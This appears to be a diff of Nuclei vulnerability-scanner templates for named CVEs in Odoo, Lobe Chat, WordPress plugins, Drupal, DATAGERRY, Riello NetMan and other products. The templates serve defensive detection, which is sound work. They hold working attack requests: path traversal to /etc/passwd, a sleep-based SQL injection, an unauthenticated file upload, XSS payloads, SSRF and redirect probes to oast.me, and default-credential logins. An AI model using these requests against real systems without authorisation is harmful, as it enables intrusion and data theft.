id: CVE-2017-5871
info:
name: Odoo <= 8.0-20160726 & 9.0 - Open Redirect
author: 1337rokudenashi
severity: medium
description: |
An Open Redirect vulnerability in Odoo versions <= 8.0-20160726 and 9.0. This issue allows an attacker to redirect users to untrusted sites via a crafted URL.
impact: |
Successful exploitation can redirect users to malicious sites, potentially leading to phishing attacks or information theft.
remediation: |
Update Odoo to the latest patched version provided by the vendor.
reference:
- https://sysdream.com/cve-2017-5871-odoo-url-redirection-to/
- https://nvd.nist.gov/vuln/detail/CVE-2017-5871
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2017-5871
cwe-id: CWE-601
cpe: cpe:2.3:a:odoo:odoo:8.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: title:"Odoo"
product: odoo
vendor: odoo
tags: cve2017,cve,odoo,redirect
http:
- method: GET
path:
- "{{BaseURL}}/web/session/logout?redirect=https://oast.me"
- "{{BaseURL}}/web/session/logout?redirect=https%3a%2f%2foast.me%2f"
- "{{BaseURL}}/web/dbredirect?redirect=https%3a%2f%2foast.me%2f"
stop-at-first-match: true
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$'
# digest: 4a0a0047304502210089a9c5c6874a8583d41a9d7bb2cf8add0d71744822a15053780e09a483917f410220452363b98076a1e77b714ec07c3e4769b3731715fb37ae5057c97a0cedc37fda:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,47 @@
id: CVE-2019-19411
info:
name: Huawei Firewall - Local File Inclusion
author: taielab
severity: low
description: |
USG9500 with versions of V500R001C30SPC100, V500R001C30SPC200, V500R001C30SPC600, V500R001C60SPC500, V500R005C00SPC100, V500R005C00SPC200 have an information leakage vulnerability. Due to improper processing of the initialization vector used in a specific encryption algorithm, an attacker who gains access to this cryptographic primitive may exploit this vulnerability to cause the value of the confidentiality associated with its use to be diminished.
reference:
- https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200115-01-firewall-en
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 3.7
cve-id: CVE-2019-19411
cwe-id: CWE-665
epss-score: 0.00078
epss-percentile: 0.34692
cpe: cpe:2.3:h:huawei:usg9500:-:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: huawei
product: usg9500
shodan-query: title:"HUAWEI"
tags: cve,cve2019,huawei,firewall,lfi
http:
- method: GET
path:
- "{{BaseURL}}/umweb/../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:[x*]:0:0:"
- type: word
part: header
words:
- "application/octet-stream"
- type: status
status:
- 200
# digest: 4a0a0047304502201592da827242899c082ee79fadb679c8f4d09f39015c2826f479656d871f61d8022100b1df18deb058c6e3ab7a79da64776a7d4cecf21ca4f9a2fb6efee7785266ae55:922c64590222798bb761d5b6d8e72950

View File

@ -67,5 +67,4 @@ http:
part: body
words:
- '{{marker}}'
# digest: 4b0a00483046022100a62b3f63f36af3be3f42ddc00ddcc153014e35c716c0205d7aee49bee6cf7e790221008fac71145d4ce5de5bcb3c91ca09e2f9ceb293f23b84d177b7bf094032cdd3d4:922c64590222798bb761d5b6d8e72950
# digest: 4a0a004730450220153fe42d9da3230c1e66329688aee8ce542c7c24b46f0e7ff23f0e5a762f5d6f02210096f12035f098a1e3ffc3458060ff7c66d5464327f5800f1c78df9add13efe4fb:922c64590222798bb761d5b6d8e72950

View File

@ -14,6 +14,8 @@ info:
- https://forum.ghost.org/t/critical-security-update-available-for-ghost-4-x/22290
- https://nvd.nist.gov/vuln/detail/CVE-2021-29484
- https://github.com/ARPSyndicate/cvemon
- https://github.com/TryGhost/Ghost/blob/95651b33a66f3240535a61999b292a725f1b3317/core/server/web/admin/views/preview.html
- https://www.sonarsource.com/blog/ghost-admin-takeover/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N
cvss-score: 6.8
@ -40,7 +42,9 @@ http:
- type: word
part: body
words:
- 'XMLHttpRequest.prototype.open'
- 'XMLHttpRequest.prototype.open = XMLHttpRequest.prototype.send'
- 'top.postMessage('
condition: and
- type: word
part: header
@ -50,4 +54,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a004730450221008708553f92fa889fe94e2e1e0179bc7fce9e53b6ee2b269d9a14da5c3992d9e702201716126335928b1f023b3fe60ebe030afac3410a41de7837f279ac714969465a:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100e0630c32616a3eb31ee9dd8cdcc4e2bef6dba96a63780a1eb9484e931c9c117d022100b0d86d03f68f6141ecba13c522c2444dcf622337c629dc528073c11afc699f1e:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,59 @@
id: CVE-2024-32964
info:
name: Lobe Chat <= v0.150.5 - Server-Side Request Forgery
author: s4e-io
severity: critical
description: |
Lobe Chat is a chatbot framework that supports speech synthesis, multimodal, and extensible Function Call plugin system. Prior to 0.150.6, lobe-chat had an unauthorized Server-Side Request Forgery vulnerability in the /api/proxy endpoint. An attacker can construct malicious requests to cause Server-Side Request Forgery without logging in, attack intranet services, and leak sensitive information.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-32964
- https://github.com/lobehub/lobe-chat/commit/465665a735556669ee30446c7ea9049a20cc7c37
- https://github.com/lobehub/lobe-chat/security/advisories/GHSA-mxhq-xw3g-rphc
- https://vulert.com/vuln-db/CVE-2024-32964
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:H
cvss-score: 9
cve-id: CVE-2024-32964
cwe-id: CWE-918
epss-score: 0.00043
epss-percentile: 0.09599
metadata:
verified: true
max-request: 2
vendor: lobehub
product: lobe-chat
fofa-query: icon_hash="1975020705"
tags: cve,cve2024,lobechat,ssrf
flow: http(1) && http(2)
http:
- raw:
- |
GET /welcome HTTP/1.1
Host: {{Hostname}}
host-redirects: true
matchers:
- type: dsl
dsl:
- 'contains(tolower(body), "lobechat")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
POST /api/proxy HTTP/1.1
Host: {{Hostname}}
Content-Type: text/plain
http://oast.me
matchers:
- type: word
part: response
words:
- "<h1> Interactsh Server </h1>"
# digest: 4a0a00473045022100b6f794837ed630ad876ec08d70900f1d0923d863a28fe24a79bbd794c73691d902207a43d609d6fd37186ea6030b79d368f2d5b616cd4a8b71672448f8c584a903f3:922c64590222798bb761d5b6d8e72950

View File

@ -19,11 +19,13 @@ info:
product: lylme_spage
fofa-query: icon_hash="-282504889"
tags: cve,cve2024,lylme-spage,rce,intrusive
flow: http(1) && http(2)
variables:
string: "{{randstr}}"
filename: "{{to_lower(rand_text_alpha(5))}}"
flow: http(1) && http(2)
http:
- raw:
- |
@ -44,8 +46,10 @@ http:
words:
- '"code":'
- '"msg":'
- '"url":'
- 'php"}'
condition: and
internal: true
- type: status
status:
@ -71,4 +75,4 @@ http:
- 'contains(body, "{{string}}" )'
- 'contains(header, "text/html")'
condition: and
# digest: 4a0a00473045022100d6aa315d5179da098583ea0872b86fe414cbc4cda8301de18ddfafb2a93013ae0220177931a6619243ead54124a71f081a30a8e952360d780e51afa8290a31cff24d:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402202a833bdb9c66a7a2d6dccd0c4233995c70eab492b172a07ab433829e6f0ab5a20220095a5b7e6640637747af5bed4a8e9bc928854d60f34e9166ec9e236dcac74632:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,78 @@
id: CVE-2024-43160
info:
name: BerqWP <= 1.7.6 - Arbitrary File Uplaod
author: s4e-io
severity: critical
description: |
The BerqWP Automated All-In-One PageSpeed Optimization Plugin for Core Web Vitals, Cache, CDN, Images, CSS, and JavaScript plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the /api/store_webp.php file in all versions up to, and including, 1.7.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.
reference:
- https://github.com/KTN1990/CVE-2024-43160
- https://nvd.nist.gov/vuln/detail/CVE-2024-43160
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/searchpro/berqwp-176-unauthenticated-arbitrary-file-uplaod
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2024-43160
cwe-id: CWE-434
epss-score: 0.00043
epss-percentile: 0.09608
metadata:
verified: true
max-request: 3
vendor: BerqWP
product: BerqWP
framework: wordpress
publicwww-query: "/wp-content/plugins/searchpro"
tags: cve,cve2024,file-upload,shell,intrusive,wp,wp-plugin,wordpress,searchpro
variables:
filename: "{{rand_base(12)}}"
num: "{{rand_int(10000000000, 999999999999999)}}"
flow: |
http(1) && http(2) && http(3)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body,"/wp-content/plugins/searchpro")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
POST /wp-json/optifer/v1/store-webp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
image="{{base64(num)}}"&url={{filename}}.txt&license_key_hash=d41d8cd98f00b204e9800998ecf8427e
matchers:
- type: dsl
dsl:
- 'contains(content_type,"application/json")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
GET /{{filename}}.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body,"{{num}}")'
- 'contains(content_type, "text/plain")'
- 'status_code == 200'
condition: and
# digest: 490a0046304402207c3b763d8409c1f056f9231ff01d7446e814c8477f1fa382815f23bdd9b5cb9b02202119bdcb37c9b6eeed2059e458bda1e69c418623934db88f2277de567c6bdcb0:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,134 @@
id: CVE-2024-43917
info:
name: WordPress TI WooCommerce Wishlist Plugin <= 2.8.2 - SQL Injection
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
In the latest version (2.8.2 as of writing the article) and below, the plugin is vulnerable to a SQL injection vulnerability that allows any users to execute arbitrary SQL queries in the database of the WordPress site. No privileges are required to exploit the issue. The vulnerability is unpatched on the latest version and is tracked as the CVE-2024-43917.
reference:
- https://patchstack.com/articles/unpatched-sql-injection-vulnerability-in-ti-woocommerce-wishlist-plugin/
- https://patchstack.com/database/vulnerability/ti-woocommerce-wishlist/wordpress-ti-woocommerce-wishlist-plugin-2-8-2-sql-injection-vulnerability?_s_id=cve
- https://nvd.nist.gov/vuln/detail/CVE-2024-43917
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-43917
cwe-id: CWE-89
epss-score: 0.00091
epss-percentile: 0.39641
cpe: cpe:2.3:a:templateinvaders:ti_woocommerce_wishlist:*:*:*:*:free:wordpress:*:*
metadata:
verified: true
max-request: 4
vendor: templateinvaders
product: ti_woocommerce_wishlist
framework: wordpress
fofa-query: body="/wp-content/plugins/ti-woocommerce-wishlist/"
publicwww-query: "/wp-content/plugins/ti-woocommerce-wishlist/"
tags: cve,cve2024,wp,wordpress,ti-woocommerce-wishlist,wp-plugin,sqli
flow: http(1) && http(2) && http(3) && http(4)
http:
- raw:
- |
GET /?p=1 HTTP/1.1
Host: {{Hostname}}
redirects: true
extractors:
- type: regex
part: body
internal: true
name: nonce
group: 1
regex:
- '"nonce":"([a-z0-9]+)"'
- raw:
- |
GET /product-category/uncategorized/ HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
internal: true
name: product_id
group: 1
regex:
- 'data-tinvwl_product_id="([0-9]+)"'
matchers:
- type: word
part: body
words:
- 'data-tinvwl_product_id="'
internal: true
- raw:
- |
POST /product-category/uncategorized/ HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryNfcbSwJQX8ALWCMG
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="form[tinvwl-hidden-fields]"
[]
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="tinv_wishlist_id"
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="tinv_wishlist_name"
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="product_type"
simple
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="product_id"
{{product_id}}
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="product_variation"
0
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="product_action"
addto
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="redirect"
{{RootURL}}/product-category/uncategorized/
------WebKitFormBoundaryNfcbSwJQX8ALWCMG--
extractors:
- type: json
part: body
name: share_key
internal: true
json:
- '.wishlist.share_key'
- raw:
- |
@timeout: 20s
GET /wp-json/wc/v3/wishlist/{{share_key}}/get_products?order=,(select*from(select(sleep(6)))a)--+- HTTP/1.1
Host: {{Hostname}}
X-WP-Nonce: {{nonce}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- "duration>=6"
- "contains(content_type, 'application/json')"
- "contains(body, 'product_id')"
condition: and
# digest: 490a0046304402207690eca3604b0ae310218e3e09ed7e01283fe3cd0058c463ba97588995b8fe2c02201c44b9bac4f09f86ce9b93a397b2f8753abade9745a84a35132428a34c99c286:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,47 @@
id: CVE-2024-45440
info:
name: Drupal 11.x-dev - Full Path Disclosure
author: DhiyaneshDK
severity: medium
description: |
core/authorize.php in Drupal 11.x-dev allows Full Path Disclosure (even when error logging is None) if the value of hash_salt is file_get_contents of a file that does not exist.
reference:
- https://senscybersecurity.nl/CVE-2024-45440-Explained/
- https://nvd.nist.gov/vuln/detail/CVE-2024-45440
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-45440
cwe-id: CWE-209
epss-score: 0.00046
epss-percentile: 0.17715
cpe: cpe:2.3:a:drupal:drupal:2023-05-09:*:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
vendor: drupal
product: drupal
shodan-query:
- http.component:"drupal"
- cpe:"cpe:2.3:a:drupal:drupal"
tags: cve,cve2024,drupal,exposure,error
http:
- method: GET
path:
- "{{BaseURL}}/core/authorize.php"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "getHashSalt"
- "RuntimeException"
condition: and
- type: status
status:
- 200
# digest: 490a00463044022054ed249c58d1f97eacc44eec47d392c89f94f74b2c5b5e77d298817beb19de4302204074bcf02eae57de46bf5175d3bd645a995584246f4cf7349bd9f71e4246f905:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,51 @@
id: CVE-2024-46627
info:
name: DATAGERRY - REST API Auth Bypass
author: gy741
severity: critical
description: |
Incorrect access control in BECN DATAGERRY v2.2 allows attackers to execute arbitrary commands via crafted web requests.
impact: |
Allows unauthorized access to REST API
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-46627
- https://daly.wtf/cve-2024-46627-incorrect-access-control-in-becn-datagerry-v2-2-allows-attackers-to-execute-arbitrary-commands-via-crafted-web-requests/
- https://datagerry.com/
- https://github.com/DATAGerry/
- https://github.com/d4lyw/CVE-2024-46627
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2024-46627
cwe-id: CWE-284
epss-score: 0.00045
epss-percentile: 0.16328
metadata:
verified: true
max-request: 1
vendor: becon
product: datagerry
shodan-query: http.title:"datagerry"
tags: cve,cve2024,becon,datagerry,unauth,auth-bypass
http:
- method: GET
path:
- '{{BaseURL}}/rest/users/1/settings/'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"response_type":'
- '"model":'
- '"time":'
condition: and
- type: word
part: content_type
words:
- "application/json"
# digest: 4a0a00473045022040420efc711ffd5727fa72189da9f4e2830a0a1bd247edefb9c4392206bdcb5f022100c7c5849fa2e4cdc7240166da0a6077f3c93557cbded880103e8580c784fdb3f1:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,70 @@
id: CVE-2024-5488
info:
name: SEOPress < 7.9 - Authentication Bypass
author: pdresearch,iamnoooob,rootxharsh
severity: critical
description: |
The SEOPress WordPress plugin before 7.9 does not properly protect some of its REST API routes, which combined with another Object Injection vulnerability can allow unauthenticated attackers to unserialize malicious gadget chains, compromising the site if a suitable chain is present.
reference:
- https://wpscan.com/blog/object-injection-vulnerability-fixed-in-seopress-7-9/
- https://wpscan.com/vulnerability/28507376-ded0-4e1a-b2fc-2182895aa14c/
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://nvd.nist.gov/vuln/detail/CVE-2024-5488
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-5488
epss-score: 0.00043
epss-percentile: 0.09608
metadata:
verified: true
max-request: 3
tags: cve,cve2024,wp,wordpress,wp-plugin,seopress,auth-bypass
flow: http(1) && http(2) && http(3)
variables:
marker: "{{randstr}}"
username: "admin"
http:
- raw:
- |
PUT /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- 'Sorry, you are not allowed to do that.'
internal: true
- raw:
- |
PUT /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username+':aaaaaa')}}
Content-Type: application/x-www-form-urlencoded
title={{marker}}&description={{marker}}
matchers:
- type: word
part: body
words:
- '"code":"success"'
internal: true
- raw:
- |
GET /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- '"title":"{{marker}}","description":"{{marker}}"'
# digest: 4a0a00473045022100c95d50e7ed0073b424b5b0259135b11ea7bdca7a18c8b8f5ec23b5cb197c95860220742e8b72bc5d7d64ffdc413ce427470f0b96f7c9a4cc53c5d0298cfa2efe112d:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,68 @@
id: CVE-2024-6517
info:
name: Contact Form 7 Math Captcha <= 2.0.1 - Cross-site Scripting
author: s4e-io
severity: medium
description: |
The Contact Form 7 Math Captcha WordPress plugin through 2.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users.
reference:
- https://wpscan.com/vulnerability/d04bab9c-7cb4-4d21-b70b-a4a7fabc3c20/
- https://nvd.nist.gov/vuln/detail/CVE-2024-6517
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2024-6517
cwe-id: CWE-79
epss-score: 0.00043
epss-percentile: 0.09608
cpe: cpe:2.3:a:dotsquares:contact_form_7_math_captcha:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: dotsquares-wpteam
product: ds-cf7-math-captcha
framework: wordpress
publicwww-query: "/wp-content/plugins/ds-cf7-math-captcha"
tags: cve,cve2024,wp,wordpress,wp-plugin,xss,ds-cf7-math-captcha
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body,"/wp-content/plugins/ds-cf7-math-captcha")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=dscf7_refreshcaptcha&tagname="<script>alert(document.domain)</script>
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"<script>alert(document.domain)</script>'
- type: word
part: content_type
words:
- 'text/html'
- type: status
status:
- 200
# digest: 4b0a00483046022100b027a0561626761eec561001fce02cfe13c26cf0c84b572a1759bac3a823fa32022100f7a35b349e671f6462ac3fb1f3e55ccec74ab7572338ce94ea7deddc14bbc5d8:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,76 @@
id: CVE-2024-7354
info:
name: Ninja Forms 3.8.6-3.8.10 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
The Ninja Forms WordPress plugin before 3.8.11 does not escape an URL before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin
impact: |
Attackers can potentially exploit this vulnerability to gain unauthorized access to sensitive information.
remediation: |
Update the plugin to Latest version. Fixed in 3.8.11.
reference:
- https://wpscan.com/vulnerability/3c871dcd-51d7-4d3b-b036-efa9e066ff41/
- https://nvd.nist.gov/vuln/detail/CVE-2024-7354
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2024-7354
cwe-id: CWE-79
epss-score: 0.00043
epss-percentile: 0.09629
cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 3
vendor: ninjaforms
product: ninja_forms
framework: wordpress
fofa-query: body="/wp-content/plugins/ninja-forms"
publicwww-query: /wp-content/plugins/ninja-forms/
shodan-query: http.html:"/wp-content/plugins/ninja-forms/"
tags: cve,cve2024,wp,wordpress,wp-plugin,ninja-forms,xss,authenticated
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- "/wp-content/plugins/ninja-forms"
internal: true
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=nf-submissions&"><script>alert(document.domain)</script>=2 HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- '"><script>alert(document.domain)</script>'
- type: word
part: content_type_2
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a004730450220480fcef4bd3f565a48904557ebdfede8f1e697a2b5fb76f9aeabce2d2b48031202210082b19d31fddf8d798a180790a1240fe11eb3da8942326a2f2c4def251fcacd3d:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,41 @@
id: CVE-2024-7714
info:
name: AI Assistant with ChatGPT by AYS <= 2.0.9 - Unauthenticated AJAX Calls
author: s4e-io
severity: medium
description: |
The plugin lacks sufficient access controls allowing an unauthenticated user to disconnect the plugin from OpenAI, thereby disabling the plugin. Multiple actions are accessible: ays_chatgpt_disconnect, ays_chatgpt_connect, and ays_chatgpt_save_feedback
remediation: Fixed in 2.1.0
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-7714
- https://wpscan.com/vulnerability/04447c76-a61b-4091-a510-c76fc8ca5664/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
cvss-score: 6.5
cve-id: CVE-2024-7714
cwe-id: CWE-284
epss-score: 0.00043
epss-percentile: 0.09599
metadata:
verified: true
max-request: 1
vendor: ays-chatgpt-assistant-team
product: ays-chatgpt-assistant
framework: wordpress
publicwww-query: "/wp-content/plugins/ays-chatgpt-assistant"
tags: cve,cve2024,ays-chatgpt-assistant,wordpress,wp-plugin,wp,iac
http:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?ays_chatgpt_assistant_id=1&action=ays_chatgpt_admin_ajax&function=ays_chatgpt_disconnect"
matchers:
- type: dsl
dsl:
- 'regex("^true$", body)'
- 'contains(content_type, "text/html")'
- 'status_code == 200'
condition: and
# digest: 4b0a00483046022100bdbe7d7b2f2802d87ca36eead8ef342616ac2deb6b62ad553f0c670ecd70a9f202210090cdb0adf148998469c6456de76728a9b85a9d162b3ee02af89f59394e8c4c60:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,43 @@
id: CVE-2024-8877
info:
name: Riello Netman 204 - SQL Injection
author: s4e-io
severity: critical
description: |
The three endpoints /cgi-bin/db_datalog_w.cgi, /cgi-bin/db_eventlog_w.cgi, and /cgi-bin/db_multimetr_w.cgi are vulnerable to SQL injection without prior authentication. This enables an attacker to modify the collected log data in an arbitrary way.
reference:
- https://cyberdanube.com/en/en-multiple-vulnerabilities-in-riello-netman-204/index.html
- https://0day.today/exploit/39757
- https://nvd.nist.gov/vuln/detail/CVE-2024-8877
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-8877
cwe-id: CWE-89
epss-score: 0.00091
epss-percentile: 0.39654
cpe: cpe:2.3:o:riello-ups:netman_204_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: riello-ups
product: netman_204_firmware
shodan-query: title:"netman 204"
fofa-query: title="netman 204"
censys-query: services.http.response.body:"netman204"
google-query: intitle:"netman 204"
tags: cve,cve2024,netman,sqli
http:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/db_eventlog_w.cgi?date_start=0&date_end=1715630160&gravity=%25&type=%25%27and/**/%271%27=%271"
matchers:
- type: dsl
dsl:
- 'contains_all(body, "START APPLICATION", "category\":", "codeStr\":")'
- 'status_code == 200'
condition: and
# digest: 4a0a0047304502204458db1ba5309cd954ea72f415abcc44c61208a52ca872f4a507f58768b0dc99022100e98ad16fa2d74810ec1adddab09484abdb1471deb7db3fd848612b4d351dfd7c:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,46 @@
id: datagerry-default-login
info:
name: Datagerry - Default Login
author: gy741
severity: high
description: |
Datagerry was using default username and password was discovered.
metadata:
verified: true
max-request: 1
shodan-query: http.title:"datagerry"
tags: datagerry,default-login
variables:
username: "admin"
password: "admin"
http:
- raw:
- |
POST /rest/auth/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"user_name":"{{username}}","password":"{{password}}"}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"token":'
- '"token_issued_at":'
- '"token_expire":'
condition: and
- type: word
part: content_type
words:
- "application/json"
- type: status
status:
- 200
# digest: 4a0a00473045022100cf8cc043be4a0b3dc195acf9b6ef53e752608e9095d2443fe3783cd935d4bec0022047df60ad555032dc21231c6899cf2213cef306d8841ed6d22810a8531d6e5f60:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,47 @@
id: gitlab-saml
info:
name: Gitlab SAML - Detection
author: rootxharsh,iamnoooob,pdresearch
severity: info
description: |
The presence of SAML-based authentication on GitLab instances. SAML is commonly used for Single Sign-On (SSO) integrations, which allows users to authenticate with GitLab using an external Identity Provider (IdP).
metadata:
verified: true
max-request: 1
vendor: gitlab
product: gitlab
shodan-query:
- http.title:"gitlab"
- cpe:"cpe:2.3:a:gitlab:gitlab"
- http.html:"gitlab enterprise edition"
fofa-query:
- body="gitlab enterprise edition"
- title="gitlab"
google-query: intitle:"gitlab"
tags: panel,saml,gitlab
http:
- raw:
- |
GET /users/auth/saml/metadata HTTP/2
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "EntityDescriptor"
- "SAML"
condition: and
- type: word
part: content_type
words:
- "application/xml"
- type: status
status:
- 200
# digest: 4a0a00473045022049996dff22c3a44f997637d9d676d9804a3135e44390d397b2749598351e58ea02210084b1da9584826133c2798118e9fa80461f9b0e6ebe38a13541539ae70dd6ea0e:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,33 @@
id: riello-netman204-panel
info:
name: Riello UPS NetMan 204 Panel - Detect
author: s4e-io
severity: info
description: |
Riello UPS NetMan 204 login panel was detected.
reference:
- https://www.riello-ups.com
metadata:
vendor: riello-ups
product: netman_204_firmware
shodan-query: title:"netman 204"
fofa-query: title="netman 204"
censys-query: services.http.response.body:"netman204"
google-query: intitle:"netman 204"
tags: netman,panel,detect,login
http:
- method: GET
path:
- "{{BaseURL}}"
host-redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'contains(body,"Netman 204")'
- 'status_code == 200'
condition: and
# digest: 4a0a0047304502206d3ffe21d0164a272b5c60a35415bb20229644ca96eb58d0cc3da872be669873022100e1c2ef6a4571d5d33e19ca03ef5baf2655681f8b13e48e3014a481e1ce2da9c9:922c64590222798bb761d5b6d8e72950

View File

@ -2,7 +2,7 @@ id: umbraco-login
info:
name: Umbraco Login Panel - Detect
author: ola456
author: ola456,stvnhrlnd
severity: info
description: Umbraco login panel was detected.
reference:
@ -27,6 +27,7 @@ http:
- method: GET
path:
- "{{BaseURL}}/umbraco"
- "{{BaseURL}}/umbraco/login"
host-redirects: true
max-redirects: 3
@ -37,8 +38,10 @@ http:
part: body
words:
- 'Umbraco.Sys'
- '<umb-auth'
condition: or
- type: status
status:
- 200
# digest: 490a00463044022043d53ad53a8ce98369cf2c3d9afa9e86bddfbb30d08e66a7c57bec1da1733fcb022011b45272a7ae99406f1177d25efc434690c7fdc11eb2c9d6d9d6bea357c3682d:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402204916ea6c0885996ed14af2e780e9ee858ada109fc78e7c8e1c5e0bc7e9728a530220480e77e4c17d6baf7a436f898415db044ce6dd801dc821a2e7febaa83cdce0c9:922c64590222798bb761d5b6d8e72950

View File

@ -21,7 +21,8 @@ http:
- /wp-config # wordpress
- /site/default/settings.php # drupal
- /installation/configuration.php # joomla
